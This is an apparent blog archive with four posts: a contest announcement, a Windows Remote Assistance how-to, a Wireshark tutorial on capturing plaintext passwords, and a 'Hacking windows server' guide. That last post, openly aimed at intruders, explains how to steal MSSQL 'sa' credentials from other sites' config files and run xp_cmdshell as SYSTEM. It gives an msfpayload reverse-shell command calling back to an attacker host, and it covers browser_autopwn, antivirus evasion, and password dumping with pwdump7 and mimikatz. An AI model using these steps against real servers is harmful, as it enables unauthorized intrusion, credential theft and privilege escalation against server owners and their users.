Stuff for Braines Search Engine

Loading

Tuesday, 12 August 2014

Embedasia 2014 - International Conference on Embedded Systems


Attention Readers Got a NEWS for You.......!


CFEI is organizing “Automotive Embedded Challenge - AEC” coming September 20th 2014 at IISc Bangalore.

 Center for Embedded Intelligence (CFEI), as a professional IT group of people, aims to support continuous growth of Indian Economy through its technology and its personnel. CFEI focuses on innovative designs for Embedded products and solutions and core Embedded Systems Trainings & Conferences. The Center has been set up for the purpose of conducting cutting edge research in embedded system technology and its application in the domains of Telecom, Avionics, Defense, Automotive and Consumer electronics, etc. CFEI intends to promote the highest standards of embedded system technology.

Automotive Embedded Contest (AEC) aims to identify, promote and reward outstanding engineering talent across India. The contest is open to all engineering students in India. This is the only event of its kind being organized for the first time in India.

  The contest provides a level-playing field for every budding engineer in automotive field to display his/her technical brilliance. The Automotive Embedded Challenge allows engineering students to develop their presentation skills and marketing capabilities by presenting ideas of your choice to a Review Panel.

Through a rigorous and challenging selection process, a distinguished panel of judges comprising of academic and industry leaders will select top thirty from a nationwide pool of thousands, to attend the final round in Bangalore during September 20th 2014.

A comprehensive case study will be made of each of the winning presentations. The winners and their idea will also be announced to the press and media.

 This is a great opportunity for your students to present an idea on Automotive (Embedded Systems) with a FREE REGISTRATION.

 For more details please click here: http://www.embedasia.com/Asc.html

 Regards,
CFEI Team.

+91-99867268828
Facebook  URL : http://tinyurl.com/lfoemhp

Linkedin URL: http://tinyurl.com/paplh44

Twitter  URL: http://tinyurl.com/lproyx8

Thursday, 13 February 2014

REMOTE SCREEN SHARING

HOW TO SHARE REMOTE SCREENS AND CONTROL PC WITHOUT ANY SOFTWARE IN WINDOWS


Remote sharing is nowadays on its peak, people use remote sharing to provide live support or for sharing screens. Most of us always use third party software's for sharing or controllingremote systems using software's like Teamviewer or Radmin etc.  Today i am going to teach you guys how to connect any two or as many as windows PC through remote without using any third party tool like team viewer etc. So lets learn how to share screens without any third party tool.

Windows Remote assistance without any external software
Windows Remote assistance without any external software


As we all knows Windows OS is  full of hidden programs that are only limited to developer or geeks. Today we are going to learn about MSRA (windows remote assistance) executable. MSRA is windows inbuilt remote assistance program using which you can control remote pc's, share remote screens, provide remote support and much more. Lets learn how to use MSRA for remote sharing.

Steps to Share or Control Remote PC using MSRA:


1. First of all click on startup and type command "MSRA" and press enter as shown below:


Type msra in search option
Type msra in search option


2. Now you will see screen like below having title "Windows Remote Assistance" , there are two options displayed:

a. Invite someone you trust to help you : Choose this option if you want to share your screenwith someone.
b. Help someone who invited you : Choose this option if you want to control someone others PC remotely.

Click on Option a "Invite someone you trust to help you" to share your screen:


invite someone to provide remote assistance
Select shown option to continue


Once you click the above option then you will see below panel with multiple options:


Options displayed for Windows remote assistance
Options displayed for Windows remote assistance

Now you can see three different options :
a. Send this invitation as file : On clicking this option you can save the invitation file and send it to anyone from which you require help. After saving the file another window will open containing the password. You have to provide that password to person whom you want to connect to your machine.

b. Use email to send an invitation: You can send invitation directly via email but it requires email client on your machine to send email like outlook etc.


c. Use Easy connect: Another method to directly connect two PC is using Easy connect but this require some basic settings at your routers end i.e. If the computer has IPv6 disabled or is behind a NAT router that blocks Teredo traffic, the Easy Connect option will be unavailable.


Now once you have send the  remote assistance invitation file to user, he can connect to your PC by double clicking the invitation file and then entering the password.


Note: You need to enable remote assistance service.


3. Help someone who invited you : By clicking this option you can provide help to anyone who has done the above task. You will need two things : Invitation file and password to connect remote PC.



Woohooo... Did you know there is another smart option by which you can directly connect to any PC using IP address? If not, well lets learn that too. Yup we can also provide windows remote assistance support using IP address too. Here are options.


1. First of all click on startup and type command "MSRA" and press enter.

2. Now you will see screen where two options are displayed, Select "Help someone who invited you".
3. After that you will see some option, click on the bottom one "Advanced connection option for help desk" as shown below :

Select advanced connection option for help desk
Select advanced connection option for help desk

After clicking option you see below panel to enter IP address:

Enter IP address or computer name
Enter IP address or computer name

After entering IP address press Next to connect to IP address. That's all.

Hope you all enjoyed the learning. If you have any queries ask me in form of comments.

See more at: https://www.stuffforbraines.blogspot.com

join us at https://www.facebook.com/StuffforBraines

Sunday, 9 February 2014

How To Capture Passwords Across The Air Network Traffic Analysis


How-To-Capture-Passwords-Across-The-Air-Network-Traffic-Analysis




ABSTRACT

     It is known that WireShark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness the potential of this tool and this is what this article aims at introducing the readers. We will learn to sniff the network effectively, create filters to find only the information we want, see it as a black hat would use this tool to steal passwords, and finally how to use WireShark to diagnose network problems or if a firewall is blocking packets correctly.

INTRODUCTION

     Today it is very unlikely that your password will be brute forced. You use the internet regularly and one day you're surprised to receive allegations of an intrusion. Evidence indicates that the intruders third party accounts departed from your account, and you have no idea what is happening. Someone may have made use of your account and performed such acts as you. How could this have happened? A strong possibility is that you have become the victim of an attack via "sniffer".

UNDERSTAND THE MAIN CONCEPT

     What are "sniffers"? The main purpose of a sniffer is to capture network traffic. They are used for network analysis purposes, however they can also be used by malicious hackers to capture your passwords, and even IDS systems are based on network sniffers.

     These programs also allow you to monitor network activity recording data (usernames, passwords; ect.) each time they access other computers on the network.

     These programs aim at monitoring ("sniffing") network traffic to capture access to network services, such as remote mail service (IMAP, POP3), remote access (telnet, rlogin, etc.), file transfer (FTP) etc.. accesses made, capturing packets. Always aimed at getting the most relevant information.
When we called the HUB computer and send information from one computer to another, in reality this data is for all ports of the HUB, and therefore for all machines. It turns out that only the machine on which the information was intended to send the operating system.

     If a sniffer were running on other computers, even without these systems sending data it travels there for the operating system, the sniffer will intercept at the network layer, capturing the data and displaying them to the user, in an unfriendly way. Generally the data is organized by type of protocol (TCP, UDP, FTP, ICMP, etc...) and each package read may have show your content.


YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS!

     Many local area networks (LANs) are configured sharing the same Ethernet segment. Virtually any computer of the network can run a "sniffer" program to "steal" users passwords. "Sniffers" work monitoring the flow of communication between computers on the network to find out when someone uses the network services previously mentioned. Each of these services uses a protocol that defines how a session is established, such as your account is identified and authenticated and how to use the service.
     To have access to these services, you first have to have a "log in". The login sequence - is part of the authentication protocol, which occurs at the beginning of each session - the "sniffers" are concerned about this, because it is this part that is your password. Therefore, it is only the filter "strings" keys that the password is obtained.


STEP BY STEP

     Currently, almost all environments use switches and not hubs, which makes sniffing a little more difficult because the switches do not send the data to all ports as a hub does, it sends directly to the port where the host destination is. So if you try to sniff a network switch you will only hear what is broadcast, or its own connection. To be able to hear everything without being the gateway of the network, an ARP spoof attack (aka ARP poisoning) is necessary, or burst the CAM table of the switch.

Basic Usage
     Now let's get our hands dirty: I'm assuming you already have the program (WireShark) installed, if you do not then download it. When starting WireShark, the displayed screen will look something like Figure 1:


Figure 1) Wireshark.

     Before you can start capturing packets, we have to define which interface will "listen" to the traffic. Click Capture > Interfaces


Figure 2) Interfaces.

     From there, a new window will appear with the list of automatically detected interfaces, simply select the desired interface by clicking the box next to the name of the interface, as in figure 3:


Figure 3) Capture Interfaces.

     If you click Start, it will begin automatically capturing packets. You can select the interface and only then it will start the capture if necessary.
     When the capture process starts, you will see several packets traversing the screen WireShark (varying according to the traffic of your machine / network). Will look something like the figure 4:


Figure 4) Capturing.

     To stop the capture, simply click the button, "Stop the running live capture".


Figure 5) Stop.

     It is important to remember that you must take care if your network is busy, the data stream may even lock your machine, then it is not advisable to leave the WireShark to capture for a long time, as we will see, we will leave it running only during the process to debug a connection. The greater the amount of packets, the longer it takes to apply a filter, find a package, etc.

     With this we have the basics of the program, we can set the capture interface, start and stop the capture. The next step is to identify what interests among many packages. For this, we will start using filters.

Using Filters

     There are a plethora of possible filters, but at this moment we will see just how to filter by IP address, port and protocol.
The filters can be constructed by clicking on "Filter", then selecting the desired filter (there is a short list of pre-defined filters), or by typing directly into the text box. After you create your filter, just click "Apply", if you wanted to see the entire list of packages again just click "Clear", this will remove the filter previously applied.



Figure 6) Filter.


     I will use a small filter list as an example:




Figure 7) Example by Chaitanya prakash


     It is also possible to group the filters, for example:
ip.src == 10.10.10.1 && tcp.dstport==80 OR ip.src == 10.10.10.1 and tcp.dstport==80

Source address 10.10.10.1 
And destination port 80


CAPTURING PASSWORDS

     Now we will see how you can capture passwords easily, just by listening to traffic. For this example we will use the POP3 protocol, which sends the data in clear text over the network. To do this, start capturing packets normally and start a session with your POP3 email server. If you use a safer protocol like IMPAPS or POP3 and I just wanted to see the functioning of the mechanism.

     Now stop the capture, filter and put "pop" and then click "Apply". now thats done, you see only the packets of POP3 connection. Now click on any of them right, and then click "Follow TCP Stream".


Figure POP3.
     With this we will open a new window with the entire contents of the ASCII connection. As the POP3 protocol sends everything in plain text, you can see all the commands executed, including the password.


Figure 9) Pass.

     This can be transported to any connection in plain text, such as FTP, Telnet, HTTP, etc.. Just to let you change the filter and examine the contents of the connection.

Importing External Captures

     Usually in servers, there is no graphical environment installed and with that you cannot use WireShark directly. If you want to analyze traffic on this server and you cannot install WireShark, so you have to capture this traffic elsewhere, the best one can do is write traffic with TCPdump locally and then copy this dump to a machine with WireShark from where a more detailed analysis is made.

     We will capture everything that comes and goes from the host 10.10.10.1 with destination port 80 and save content in capture*****.pcap file from the local folder where the command was executed. Run the server:s

tcpdump -i eth0 host 10.10.10.1 and dst 
port 80 -w 
capture*****.pcap

     Once you're finished capturing, simply use CTRL + C to copy the file to the machine WireShark capture and import by clicking on File -> Import. Once imported, you can use the program normally as if the capture had occurred locally.


EVOLUTION OF THINKING

Why steal your password?

     There are various reasons that lead people to steal passwords from simply to annoy someone (sending email as you) up to perform illegal activities (invasion on other computers, theft of information, etc.) An attraction to crackers is the ability to use the identity of others in these activities.

     One of the main reasons that attackers try to break systems and install "sniffers" is the ability to quickly capture the maximum number accounts. Thus, the more accounts this attacker has , the easier it is to hide your stash.

How can you protect yourself?

     Do not think that "sniffers" can make all the whole internet insecure. It is not so. You need to be aware of where the risk is , when you're at risk and what to do to be safe .

     When you have your credit card stolen or suspect that someone may be using it improperly, you cancel the card. Likewise, as passwords can be stolen, it's critical that you replace it regularly. This precaution limites the amount of time that a stolen password can be used by an attacker.

     Never share your password with others. This sharing makes it difficult to know where your password is being used (exposed) and is harder to detect unauthorized use. A password is like a tooth brush never share it and change it regularly.

     Never give your password to anyone that is claiming they need access to fix your account problem or wanting to investigate the breach of a system. This trick is one of the most effective methods of hacking, known as "social engineering."

Use networks you can trust

     Another aspect you should take into consideration is what network you can trust and which you cannot. If you are traveling and need to access an organizations computer remotely have a great level of assurance that the network is secure. For example, pick any file in your home directory that you share is it available to a "LanHouse" or network of another organization . Are you sure you can trust the network?

     If you have no alternative for secure remote access and only have available resources such as telnet, for example, you can "mitigate" this effect by changing the password at the end of each session. Remember that only the first packet (200-300 bytes)of each session carry information from your "login". Therefore, to always change your password before logging out, this will not be captured and password before it that were exposed to the network are no longer valid. Of course it is possible to capture everything going across the network, but the attacker has no intention of filling their file system quickly and becoming so easily discovered.

Why are networks so vulnerable to "sniffers"?

     There are several reasons and there is no quick solution to the problem.

     Part of the problem is that companies tend to invest in more new features rather than add security. New security features can create the most difficult systems to configure and less convenient to use. Remember companies try to adhere to the C.I.A. triangle (confidentiality, integrity, and availability). New features create unintended effects on availability when this happens policy is overlooked creating a new vulnerability in itself.

     Another part of the problem is related to added costs for Ethernet switches, hubs, network interfaces that do not support the particular "promiscuous" that sniffers can use.


CONCLUSION

     The question that remains is how can we protect ourselves from this threat...


i) Network cards that cannot be put into "promiscuous" mode. Thus, computers cannot be mastered and transformed into "sniffers".

ii) Typically, the Ethernet interface only passes packets to the highest level protocol that are intended for local machine. Switching this interface into promiscuous mode allows all packets that are accepted and passed to the higher layer of the protocol stack. This allows the selection you want.

iii) Packages that encrypt data in transit over the network, thus avoiding to flow passwords "in the clear".

     I would remind you that the safest thing to adopt and encourage the use of is software which enables remote access encrypted sessions, they help to make your environment much more secure.

     One fairly common encryption technology currently in secure communication between remote machines SSH (Secure Shell). SSH is available for different platforms. Its use does not prevent the password captured, but as this is not an encrypted service to the attacker. SSH negotiates connections using RSA algorithm. Once the service is authenticated, all subsequent traffic is encrypted using IDEA technology. This type of encryption is very strong.

     In the future, security will be increasingly intrinsic to the systems and infrastructure networks. No use having all the "apparatus" of security if you need, but do not use them. Security is not something that can be completely secure. Remember, no one is 100% secure - 

See more at: https://www.stuffforbraines.blogspot.com

join us at https://www.facebook.com/StuffforBraines

Saturday, 18 May 2013

Hacking windows server


                                     

                                 Hacking Windows Server




Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
  • Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
  • Using meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.


Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download ithere.

After logging into MSSQL server with sa account, we get a list of databases and their contents.


Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-
xp_cmdshell 'whoami'


This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
  
2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.

For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.


3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what I'm trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-
iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.


4. Using readily available tools-
Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:


#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:


You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.
Happy Hacking :)